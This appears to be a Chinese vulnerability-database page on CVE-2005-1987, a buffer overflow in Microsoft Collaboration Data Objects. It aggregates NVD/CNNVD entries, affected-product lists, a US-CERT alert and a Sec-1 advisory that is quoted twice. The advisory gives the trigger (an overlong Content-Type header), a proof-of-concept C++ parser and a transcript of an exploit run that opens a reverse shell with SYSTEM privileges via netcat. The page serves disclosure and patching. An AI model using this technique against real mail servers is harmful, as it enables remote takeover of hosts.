CVE-2005-1987
CVSS7.5
发布时间 :2005-10-13 06:02:00
修订时间 :2016-10-17 23:23:44
NMCOPS    

[原文]Buffer overflow in Collaboration Data Objects (CDO), as used in Microsoft Windows and Microsoft Exchange Server, allows remote attackers to execute arbitrary code when CDOSYS or CDOEX processes an e-mail message with a large header name, as demonstrated using the "Content-Type" string.


[CNNVD]Microsoft协作数据对象远程溢出漏洞(CNNVD-200510-082)

        Microsoft Windows是微软发布的非常流行的操作系统,协作数据对象(CDO)是一个COM组件,用于在其他函数间更容易地编写创建或更改Internet邮件消息的程序。
        Microsoft CDO中存在远程溢出漏洞。攻击者可以创建特制的网络消息(通常由SMTP传输)。如果受影响系统上的CDOSYS或CDOEX处理了该消息的话,就可能导致执行任意代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/o:microsoft:windows_2003_server:64-bit
cpe:/o:microsoft:windows_2003_server:itanium
cpe:/o:microsoft:windows_xp:::64-bit
cpe:/o:microsoft:windows_xp::sp2:tablet_pcMicrosoft windows xp_sp2 tablet_pc
cpe:/a:microsoft:exchange_server:2000:sp3Microsoft Exchange Server 2000 Service Pack 3
cpe:/o:microsoft:windows_xp::sp1:tablet_pcMicrosoft windows xp_sp1 tablet_pc
cpe:/o:microsoft:windows_2003_server:sp1
cpe:/o:microsoft:windows_2003_server:r2
cpe:/o:microsoft:windows_2000::sp4::fr
cpe:/o:microsoft:windows_2003_server:sp1::itanium

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:848Buffer Overflow in CDOSYS Message Processing (64-bit WinXP,SP1)
oval:org.mitre.oval:def:581Buffer Overflow in CDOSYS Message Processing (Server 2003,SP1)
oval:org.mitre.oval:def:1515Buffer Overflow in CDOSYS Message Processing (WinXP,SP2)
oval:org.mitre.oval:def:1420Buffer Overflow in CDOSYS Message Processing (Win2K,SP4)
oval:org.mitre.oval:def:1406Buffer Overflow in CDOSYS Message Processing (WinXP,SP1)
oval:org.mitre.oval:def:1201Buffer Overflow in CDOEX Message Processing
oval:org.mitre.oval:def:1130Buffer Overflow in CDOSYS Message Processing (Server 2003)
oval:gov.nist.fdcc.patch:def:221MS05-048: Vulnerability in the Microsoft Collaboration Data Objects Could Allow Remote Code Execution (907245)
oval:gov.nist.USGCB.patch:def:221MS05-048: Vulnerability in the Microsoft Collaboration Data Objects Could Allow Remote Code Execution (907245)
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1987
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1987
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200510-082
(官方数据源) CNNVD

- 其它链接及资源

http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0289.html
(UNKNOWN)  FULLDISC  20051012 [SEC-1 Advisory] Collaboration Data Objects Buffer Overflow Vulnerability
http://marc.info/?l=bugtraq&m=112915118302012&w=2
(UNKNOWN)  BUGTRAQ  20051012 [SEC-1 Advisory] Collaboration Data Objects Buffer Overflow Vulnerability
http://securitytracker.com/id?1015038
(UNKNOWN)  SECTRACK  1015038
http://securitytracker.com/id?1015039
(UNKNOWN)  SECTRACK  1015039
http://support.microsoft.com/default.aspx?scid=kb;%5BLN%5D;Q907245
(UNKNOWN)  MSKB  Q907245
http://www.kb.cert.org/vuls/id/883460
(VENDOR_ADVISORY)  CERT-VN  VU#883460
http://www.microsoft.com/technet/security/bulletin/ms05-048.mspx
(VENDOR_ADVISORY)  MS  MS05-048
http://www.securityfocus.com/bid/15067
(UNKNOWN)  BID  15067
http://www.us-cert.gov/cas/techalerts/TA05-284A.html
(VENDOR_ADVISORY)  CERT  TA05-284A
http://xforce.iss.net/xforce/xfdb/22495
(UNKNOWN)  XF  win-cdo-bo(22495)

- 漏洞信息

Microsoft协作数据对象远程溢出漏洞
高危 缓冲区溢出
2005-10-13 00:00:00 2005-11-30 00:00:00
远程  
        Microsoft Windows是微软发布的非常流行的操作系统,协作数据对象(CDO)是一个COM组件,用于在其他函数间更容易地编写创建或更改Internet邮件消息的程序。
        Microsoft CDO中存在远程溢出漏洞。攻击者可以创建特制的网络消息(通常由SMTP传输)。如果受影响系统上的CDOSYS或CDOEX处理了该消息的话,就可能导致执行任意代码。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:
        http://www.microsoft.com/technet/security/bulletin/MS05-048.mspx

- 漏洞信息 (F40726)

sec-1-Collarboration.txt (PacketStormID:F40726)
2005-10-15 00:00:00
Gary O'Leary-Steele  sec-1.com
advisory,overflow
CVE-2005-1987
[点击下载]

Sec-1 has identified an exploitable buffer overflow within Collaboration Data Objects (Cdosys.dll and Cdoex.dll). The vulnerability exists when event sinks are used within Microsoft Exchange 2000 or Microsoft Mail services to parse e-mail content. Several Content Security packages were identified to be vulnerable/exploitable.

SEC-1 LTD.
                              www.sec-1.com

                             Security Advisory

Advisory Name: 	Collaboration Data Objects Buffer Overflow Vulnerability
  Application: 	Multiple Applications that implement CDO
     Platform: 	Windows 2000 (All versions)
			Windows XP (All versions inc sp2)
			Windows Server 2003 (All versions)
			Exchange 2000 Server Service Post-Service pack 3

     Severity: 	Critical. Remote Code Execution 
       Author: 	Gary O'leary-Steele 
Vendor Status: 	Patch Released
CVE Candidate: 	CAN-2005-1987
    Reference:	http://www.sec-1.com
    Disclosed:	12/October/2005


Vulnerability Details: 

Sec-1 has identified an exploitable Buffer Overflow within Collaboration
Data Objects (Cdosys.dll and Cdoex.dll). The vulnerability exists when 
event sinks are used within Microsoft Exchange 2000 or Microsoft Mail
services to parse e-mail content. Several Content Security packages
were identified to be vulnerable/exploitable.

The vulnerability can be exploited by crafting an e-mail with a large 
header name such as "Content-Type<LARGE STRING>:". 
A failure to correctly determine the length of the string results in a
stack overflow. Successful exploitation of the vulnerability could allow
the attacker to gain complete control of the vulnerable host. Under 
certain conditions the vulnerability can also be used to bypass content
security mechanisms such as virus and content security scanners. Proof
of
concept code to recreate the problem is included at the bottom of this 
advisory.


Exploit Availability:

Sec-1 do not release exploit code to the general public. 
Attendees of the Sec-1 Applied Hacking & Intrusion prevention course 
will receive a copy of this exploit as part of the Sec-1 Exploit
Arsenal. 
See: http://www.sec-1.com/applied_hacking_course.html


Exploit Example:

[root@homer PoC]# perl cdo.pl -f me@test.com -t me@test.com -h 10.0.0.53

Enter IP address of your attacking host: 10.0.0.200
Enter Port for shellcode to connect back on: 80

[*]----Connected OK!
[*]----Sending MAIL FROM: me@test.com
[*]----Sending RCPT TO: <me@test.com>
[*]----Sending Malformed E-mail body
[*]----Shellcode Length: 316
[*]----Shellcode type: Reverse shell
[*]----Done.

[!]	Note this may take a while. Inetinfo will crash and restart
	This will happen until a nops are reached. You may also want 
	to clear the queue to restore Inetinfo.exe by deleting malformed

	e-mail from c:\Inetpub\mailroot\Queue

[root@homer PoC]# nc -l -p 80 -v
listening on [any] 80 ...

10.0.0.53: inverse host lookup failed: Unknown host
connect to [10.0.0.200] from (UNKNOWN) [10.0.0.53] 1100
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.


C:\WINNT\system32>c:\whoami
NT AUTHORITY\SYSTEM

C:\WINNT\system32>


Vendor Response:

Microsoft have released the following information including a fix,
http://www.microsoft.com/technet/security/bulletin/MS05-048.mspx


Common Vulnerabilities and Exposures (CVE) Information:

The Common Vulnerabilities and Exposures (CVE) project has assigned 
the following names to these issues.  These are candidates for 
inclusion in the CVE list (http://cve.mitre.org), which standardizes 
names for security problems.

		CAN-2005-1987


Demonstration:

The following CDO code demonstrates the problem.

Step 1.

Create an E-mail named vuln.eml including a large "Content-Type:"
header.

Step 2.

// Compile with -GX option
#import <msado15.dll> no_namespace rename("EOF", "adoEOF")
#import <cdosys.dll> rename_namespace("CDO")

#include <stdio.h>

int main()
{

CoInitialize(0);
try
{
 CDO::IMessagePtr spMsg(__uuidof(CDO::Message));
 _StreamPtr spStream(spMsg->GetStream());
 spStream->Position = 0;
 spStream->Type = adTypeBinary;
 spStream->LoadFromFile("vuln.eml");
 spStream->Flush();

  for(long i = 1; i <= spMsg->BodyPart->BodyParts->Count; i++)
  {
	CDO::IBodyPartPtr spBdy = spMsg->BodyPart->BodyParts->Item[i];
	_variant_t v =
spBdy->Fields->Item["urn:schemas:mailheader:Content-Type"]->Value;
  }

}
  catch(_com_error &e)
	{
	printf("COM error[0x%X, %s]\n", e.Error(),
(LPCTSTR)e.Description());
	}
	catch(...)
	{
	printf("General exception\n");
	}

	CoUninitialize();

	return 0;
}

	CDO::IBodyPartPtr spBdy = spMsg->BodyPart->BodyParts->Item[i];
	_variant_t v =
spBdy->Fields->Item["urn:schemas:mailheader:Content-Type"]->Value;


Copyright 2005 Sec-1 LTD. All rights reserved.
**************************************************************
NEW: Sec-1 Hacking Training - Learn to breach network security 
to further your knowledge and protect your network 
http://www.sec-1.com/applied_hacking_course.html
**************************************************************


    

- 漏洞信息 (F40674)

CDObo.txt (PacketStormID:F40674)
2005-10-12 00:00:00
Gary O'Leary-Steele  sec-1.com
advisory,overflow
CVE-2005-1987
[点击下载]

Sec-1 has identified an exploitable Buffer Overflow within Collaboration Data Objects (Cdosys.dll and Cdoex.dll). The vulnerability exists when event sinks are used within Microsoft Exchange 2000 or Microsoft Mail services to parse e-mail content. Several Content Security packages were identified to be vulnerable/exploitable.

SEC-1 LTD.
                              www.sec-1.com

                             Security Advisory

Advisory Name: 	Collaboration Data Objects Buffer Overflow Vulnerability
  Application: 	Multiple Applications that implement CDO
     Platform: 	Windows 2000 (All versions)
			Windows XP (All versions inc sp2)
			Windows Server 2003 (All versions)
			Exchange 2000 Server Service Post-Service pack 3

     Severity: 	Critical. Remote Code Execution 
       Author: 	Gary O'leary-Steele 
Vendor Status: 	Patch Released
CVE Candidate: 	CAN-2005-1987
    Reference:	http://www.sec-1.com
    Disclosed:	12/October/2005


Vulnerability Details: 

Sec-1 has identified an exploitable Buffer Overflow within Collaboration
Data Objects (Cdosys.dll and Cdoex.dll). The vulnerability exists when 
event sinks are used within Microsoft Exchange 2000 or Microsoft Mail
services to parse e-mail content. Several Content Security packages
were identified to be vulnerable/exploitable.

The vulnerability can be exploited by crafting an e-mail with a large 
header name such as "Content-Type<LARGE STRING>:". 
A failure to correctly determine the length of the string results in a
stack overflow. Successful exploitation of the vulnerability could allow
the attacker to gain complete control of the vulnerable host. Under 
certain conditions the vulnerability can also be used to bypass content
security mechanisms such as virus and content security scanners. Proof
of
concept code to recreate the problem is included at the bottom of this 
advisory.


Exploit Availability:

Sec-1 do not release exploit code to the general public. 
Attendees of the Sec-1 Applied Hacking & Intrusion prevention course 
will receive a copy of this exploit as part of the Sec-1 Exploit
Arsenal. 
See: http://www.sec-1.com/applied_hacking_course.html


Exploit Example:

[root@homer PoC]# perl cdo.pl -f me@test.com -t me@test.com -h 10.0.0.53

Enter IP address of your attacking host: 10.0.0.200
Enter Port for shellcode to connect back on: 80

[*]----Connected OK!
[*]----Sending MAIL FROM: me@test.com
[*]----Sending RCPT TO: <me@test.com>
[*]----Sending Malformed E-mail body
[*]----Shellcode Length: 316
[*]----Shellcode type: Reverse shell
[*]----Done.

[!]	Note this may take a while. Inetinfo will crash and restart
	This will happen until a nops are reached. You may also want 
	to clear the queue to restore Inetinfo.exe by deleting malformed

	e-mail from c:\Inetpub\mailroot\Queue

[root@homer PoC]# nc -l -p 80 -v
listening on [any] 80 ...

10.0.0.53: inverse host lookup failed: Unknown host
connect to [10.0.0.200] from (UNKNOWN) [10.0.0.53] 1100
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.


C:\WINNT\system32>c:\whoami
NT AUTHORITY\SYSTEM

C:\WINNT\system32>


Vendor Response:

Microsoft have released the following information including a fix,
http://www.microsoft.com/technet/security/bulletin/MS05-048.mspx


Common Vulnerabilities and Exposures (CVE) Information:

The Common Vulnerabilities and Exposures (CVE) project has assigned 
the following names to these issues.  These are candidates for 
inclusion in the CVE list (http://cve.mitre.org), which standardizes 
names for security problems.

		CAN-2005-1987


Demonstration:

The following CDO code demonstrates the problem.

Step 1.

Create an E-mail named vuln.eml including a large "Content-Type:"
header.

Step 2.

// Compile with -GX option
#import <msado15.dll> no_namespace rename("EOF", "adoEOF")
#import <cdosys.dll> rename_namespace("CDO")

#include <stdio.h>

int main()
{

CoInitialize(0);
try
{
 CDO::IMessagePtr spMsg(__uuidof(CDO::Message));
 _StreamPtr spStream(spMsg->GetStream());
 spStream->Position = 0;
 spStream->Type = adTypeBinary;
 spStream->LoadFromFile("vuln.eml");
 spStream->Flush();

  for(long i = 1; i <= spMsg->BodyPart->BodyParts->Count; i++)
  {
	CDO::IBodyPartPtr spBdy = spMsg->BodyPart->BodyParts->Item[i];
	_variant_t v =
spBdy->Fields->Item["urn:schemas:mailheader:Content-Type"]->Value;
  }

}
  catch(_com_error &e)
	{
	printf("COM error[0x%X, %s]\n", e.Error(),
(LPCTSTR)e.Description());
	}
	catch(...)
	{
	printf("General exception\n");
	}

	CoUninitialize();

	return 0;
}

	CDO::IBodyPartPtr spBdy = spMsg->BodyPart->BodyParts->Item[i];
	_variant_t v =
spBdy->Fields->Item["urn:schemas:mailheader:Content-Type"]->Value;


Copyright 2005 Sec-1 LTD. All rights reserved.
**************************************************************
NEW: Sec-1 Hacking Training - Learn to breach network security 
to further your knowledge and protect your network 
http://www.sec-1.com/applied_hacking_course.html
**************************************************************
    

- 漏洞信息 (F40619)

Technical Cyber Security Alert 2005-284A (PacketStormID:F40619)
2005-10-12 00:00:00
US-CERT  cert.org
advisory,remote,denial of service,arbitrary,vulnerability
windows
CVE-2005-2120,CVE-2005-1987,CVE-2005-2122,CVE-2005-2128,CVE-2005-2119,CVE-2005-1978,CVE-2005-2127,CVE-2005-0163
[点击下载]

Microsoft has released updates that address critical vulnerabilities in Windows, Internet Explorer, and Exchange Server. Exploitation of these vulnerabilities could allow a remote, unauthenticated attacker to execute arbitrary code or cause a denial of service on an affected system.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


            Technical Cyber Security Alert TA05-284A 
  Microsoft Windows, Internet Explorer, and Exchange Server
  Vulnerabilities

   Original release date: October 11, 2005
   Last revised: --
   Source: US-CERT

Systems Affected

     * Microsoft Windows
     * Microsoft Internet Explorer
     * Microsoft Exchange Server

   For more complete information, refer to the Microsoft Security
   Bulletin Summary for October 2005.

Overview

   Microsoft has released updates that address critical vulnerabilities
   in Windows, Internet Explorer, and Exchange Server. Exploitation of
   these vulnerabilities could allow a remote, unauthenticated attacker
   to execute arbitrary code or cause a denial of service on an affected
   system.

I. Description

   Microsoft Security Bulletins for October 2005 address vulnerabilities
   in Windows and Internet Explorer. Further information is available in
   the following US-CERT Vulnerability Notes:


   VU#214572 - Microsoft Plug and Play fails to properly validate user
   supplied data 

   Microsoft Plug and Play contains a flaw in the handling of message
   buffers that may result in local or remote arbitrary code execution or
   denial-of-service conditions.
   (CAN-2005-2120)


   VU#883460 - Microsoft Collaboration Data Objects buffer overflow 

   A buffer overflow in Microsoft Collaboration Data Objects may allow a
   remote, unauthenticated attacker to execute arbitrary code on a
   vulnerable system.
   (CAN-2005-1987)


   VU#922708 - Microsoft Windows Shell fails to handle shortcut files
   properly 

   Microsoft Windows Shell does not properly handle some shortcut files
   and may permit arbitrary code execution when a specially-crafted file
   is opened.
   (CAN-2005-2122)


   VU#995220 - Microsoft DirectShow buffer overflow 

   A buffer overflow in Microsoft DirectShow may allow a remote,
   unauthenticated attacker to execute arbitrary code on a vulnerable
   system.
   (CAN-2005-2128)


   VU#180868 - Microsoft Distributed Transaction Coordinator vulnerable
   to buffer overflow via specially crafted network message 

   Microsoft Distributed Transaction Coordinator (MSDTC) may be
   vulnerable to a flaw that allows remote, unauthenticated attackers to
   execute arbitrary code.
   (CAN-2005-2119)


   VU#950516 - Microsoft COM+ contains a memory management flaw 

   Microsoft COM+ contains a vulnerability due to a memory management
   flaw that may allow an attacker to take complete control of an
   affected system.
   (CAN-2005-1978)


   VU#959049 - Several COM objects cause memory corruption in Microsoft
   Internet Explorer 

   Microsoft Internet Explorer will initialize COM objects that were not
   intended to be used in the web browser. Several COM objects have been
   identified that may allow an attacker to execute arbitrary code or
   crash Internet Explorer.
   (CAN-2005-2127)


   VU#680526 - Microsoft Internet Explorer allows non-ActiveX COM objects
   to be instantiated

   Microsoft Internet Explorer will initialize COM objects that were not
   intended to be used in the web browser. This may allow an attacker to
   execute arbitrary code or crash Internet Explorer.
   (CAN-2005-0163)

II. Impact

   Exploitation of these vulnerabilities may allow a remote,
   unauthenticated attacker to execute arbitrary code with SYSTEM
   privileges or with the privileges of the user. If the user is logged
   on with administrative privileges, the attacker could take complete
   control of an affected system. An attacker may also be able to cause a
   denial of service.

III. Solution

Apply Updates

   Microsoft has provided the updates for these vulnerabilities in the
   Security Bulletins and on the Microsoft Update site.

Workarounds

   Please see the following US-CERT Vulnerability Notes for workarounds.

Appendix A. References

     * Microsoft Security Bulletin Summary for October 2005 -
       <http://www.microsoft.com/technet/security/bulletin/ms05-oct.mspx>

     * US-CERT Vulnerability Note VU#214572 -
       <http://www.kb.cert.org/vuls/id/214572>

     * US-CERT Vulnerability Note VU#883460 -
       <http://www.kb.cert.org/vuls/id/883460>

     * US-CERT Vulnerability Note VU#922708 -
       <http://www.kb.cert.org/vuls/id/922708>

     * US-CERT Vulnerability Note VU#995220 -
       <http://www.kb.cert.org/vuls/id/995220>

     * US-CERT Vulnerability Note VU#180868 -
       <http://www.kb.cert.org/vuls/id/180868>

     * US-CERT Vulnerability Note VU#950516 -
       <http://www.kb.cert.org/vuls/id/950516>

     * US-CERT Vulnerability Note VU#959049 -
       <http://www.kb.cert.org/vuls/id/959049>

     * US-CERT Vulnerability Note VU#680526 -
       <http://www.kb.cert.org/vuls/id/680526>

     * CAN-2005-2120 -
       <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2120>

     * CAN-2005-1987 -
       <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1987>

     * CAN-2005-2122 -
       <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2122>

     * CAN-2005-2128 -
       <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2128>

     * CAN-2005-2119 -
       <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2119>

     * CAN-2005-1978 -
       <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1978>

     * CAN-2005-2127 -
       <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2127>

     * CAN-2005-0163 -
       <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0163>

     * Microsoft Update - <https://update.microsoft.com/microsoftupdate>


  _________________________________________________________________

   The most recent version of this document can be found at:

   <http://www.us-cert.gov/cas/techalerts/TA05-284A.html> 
  _________________________________________________________________

   Feedback can be directed to US-CERT.  Please send email to:
   <cert@cert.org> with "TA05-284A Feedback VU#959049" in the subject.
  _________________________________________________________________

   Revision History

   Oct 11, 2004: Initial release
  _________________________________________________________________

   Produced 2005 by US-CERT, a government organization.
  
   Terms of use

   <http://www.us-cert.gov/legal.html>
  _________________________________________________________________

   For instructions on subscribing to or unsubscribing from this 
   mailing list, visit <http://www.us-cert.gov/cas/>.





-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)

iQEVAwUBQ0xBVn0pj593lg50AQJvOQf/QqIy3putm/wkUAUguQaylsCfC38Lysdc
bqbtj7oF6HEoCzhQguaqQdMGOqa4QJnrObnkHN29xFhYovKWOIYkYsh6c3IXaNLK
PdImVbcMFNn9VsBNNRVr2dqPXJPvgFFzQKsDcKkknnZyxLf5mshwDJoKFsKDGr9c
1P9yxwyagQ8G73gTq6hPV/Wl/6zElXH/chlh6haXe6XN9ArTmz8A3OCAN+BZQUqe
/9T4US8oxLeLlNDcQc/PV5v3VuXXW0v9kjEjqAVEH5tRKH/oIkVdgpj7gdrAzDjM
MUojHfl1v2/JwWubQ9DFQsBx4Jxv5YvJEREsU7RbVJotn02+Yaaeog==
=5hXu
-----END PGP SIGNATURE-----
    

- 漏洞信息

19905
Microsoft Collaboration Data Objects Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity

- 漏洞描述

A remote overflow exists in Microsoft Collaboration Data Objects (CDO). The component fails to perform proper bounds checking resulting in a buffer overflow. With a specially crafted email message containing an overly long header line, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2005-10-12 Unknow
2005-10-13 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

- 漏洞信息

Microsoft Collaboration Data Objects Remote Buffer Overflow Vulnerability
Boundary Condition Error 15067
Yes No
2005-10-11 12:00:00 2009-07-12 05:56:00
Gary O'leary-Steele of Sec-1 reported this issue to the vendor.

- 受影响的程序版本

Nortel Networks Centrex IP Element Manager 8.0
Nortel Networks Centrex IP Element Manager 7.0
Nortel Networks Centrex IP Element Manager 2.5
Nortel Networks Centrex IP Client Manager 8.0
Nortel Networks Centrex IP Client Manager 7.0
Nortel Networks Centrex IP Client Manager 2.5
Nortel Networks Centrex IP Client Manager
Microsoft Windows XP Professional x64 Edition
Microsoft Windows XP Professional SP2
Microsoft Windows XP Professional SP1
Microsoft Windows XP Professional
Microsoft Windows XP Media Center Edition SP2
Microsoft Windows XP Media Center Edition SP1
Microsoft Windows XP Media Center Edition
Microsoft Windows XP Home SP2
Microsoft Windows XP Home SP1
Microsoft Windows XP Home
Microsoft Windows Server 2003 Web Edition SP1
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Server 2003 Standard x64 Edition
Microsoft Windows Server 2003 Standard Edition SP1
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Enterprise x64 Edition
Microsoft Windows Server 2003 Enterprise Edition Itanium SP1
Microsoft Windows Server 2003 Enterprise Edition Itanium 0
Microsoft Windows Server 2003 Enterprise Edition SP1
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Datacenter x64 Edition
Microsoft Windows Server 2003 Datacenter Edition Itanium SP1
Microsoft Windows Server 2003 Datacenter Edition Itanium 0
Microsoft Windows Server 2003 Datacenter Edition SP1
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
Microsoft Windows 2000 Professional SP4
Microsoft Windows 2000 Professional SP3
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Datacenter Server SP3
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server
Microsoft IIS 6.0
+ Microsoft Windows Server 2003 Datacenter Edition
+ Microsoft Windows Server 2003 Datacenter Edition
+ Microsoft Windows Server 2003 Datacenter Edition Itanium 0
+ Microsoft Windows Server 2003 Datacenter Edition Itanium 0
+ Microsoft Windows Server 2003 Enterprise Edition
+ Microsoft Windows Server 2003 Enterprise Edition
+ Microsoft Windows Server 2003 Enterprise Edition Itanium 0
+ Microsoft Windows Server 2003 Enterprise Edition Itanium 0
+ Microsoft Windows Server 2003 Standard Edition
+ Microsoft Windows Server 2003 Standard Edition
+ Microsoft Windows Server 2003 Web Edition
+ Microsoft Windows Server 2003 Web Edition
Microsoft IIS 5.1
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
+ Microsoft Windows XP 64-bit Edition SP1
+ Microsoft Windows XP 64-bit Edition
+ Microsoft Windows XP 64-bit Edition
- Microsoft Windows XP Home SP1
- Microsoft Windows XP Home SP1
- Microsoft Windows XP Home
- Microsoft Windows XP Home
+ Microsoft Windows XP Professional SP1
+ Microsoft Windows XP Professional SP1
+ Microsoft Windows XP Professional
+ Microsoft Windows XP Professional
Microsoft IIS 5.0
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP1
+ Microsoft Windows 2000 Advanced Server
+ Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
+ Microsoft Windows 2000 Professional
+ Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP1
+ Microsoft Windows 2000 Server
+ Microsoft Windows 2000 Server
Microsoft Exchange Server 2000 SP3
Microsoft Exchange Server 2000 SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
Microsoft Exchange Server 2000 SP1
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
Microsoft Exchange Server 2000
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server

- 漏洞讨论

Microsoft CDO is susceptible to a remote buffer overflow vulnerability. This issue is due to a failure of the library to properly bounds check user-supplied data prior to copying it to an insufficiently sized memory buffer.

This issue presents itself when an attacker sends a specifically crafted email message to an email server utilizing the affected library.

This issue allows remote attackers to execute arbitrary machine code in the context of the application utilizing the library.

- 漏洞利用

The issue may be triggered by crafting an email with an overly long header name, for example:

Content-Type&lt;LARGE STRING&gt;:

The researcher who discovered this issue has developed working exploit code. This exploit code is not known to be circulating in the wild.

- 解决方案

Nortel Networks has released a technical support bulletin (2005006318) regarding this and other issues for their Centrex IP Client Manager (CICM). They report the vulnerabilities will be fixed in the upcoming 2.5, 7.0 and 8.0 maintenance releases. Please see the referenced bulletin for further information.

Fixes are available:


Microsoft Windows Server 2003 Datacenter Edition SP1

Microsoft Windows Server 2003 Datacenter x64 Edition

Microsoft Windows Server 2003 Enterprise Edition SP1

Microsoft Windows XP Media Center Edition SP2

Microsoft Windows Server 2003 Datacenter Edition

Microsoft Windows 2000 Advanced Server SP4

Microsoft Windows Server 2003 Enterprise Edition Itanium SP1

Microsoft Windows Server 2003 Enterprise Edition

Microsoft Windows XP Home SP2

Microsoft Windows 2000 Datacenter Server SP4

Microsoft Windows XP Media Center Edition SP1

Microsoft Windows Server 2003 Web Edition

Microsoft Windows XP Home SP1

Microsoft Windows XP Professional x64 Edition

Microsoft Windows Server 2003 Web Edition SP1

Microsoft Windows Server 2003 Enterprise Edition Itanium 0

Microsoft Windows Server 2003 Standard Edition SP1

Microsoft Windows Server 2003 Standard Edition

Microsoft Exchange Server 2000 SP3

Microsoft Windows XP Professional SP2

Microsoft Windows Server 2003 Datacenter Edition Itanium SP1

Microsoft Windows Server 2003 Standard x64 Edition

Microsoft Windows 2000 Server SP4

Microsoft Windows 2000 Professional SP4

Microsoft Windows Server 2003 Enterprise x64 Edition

Microsoft Windows XP Professional SP1

Microsoft Windows Server 2003 Datacenter Edition Itanium 0

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站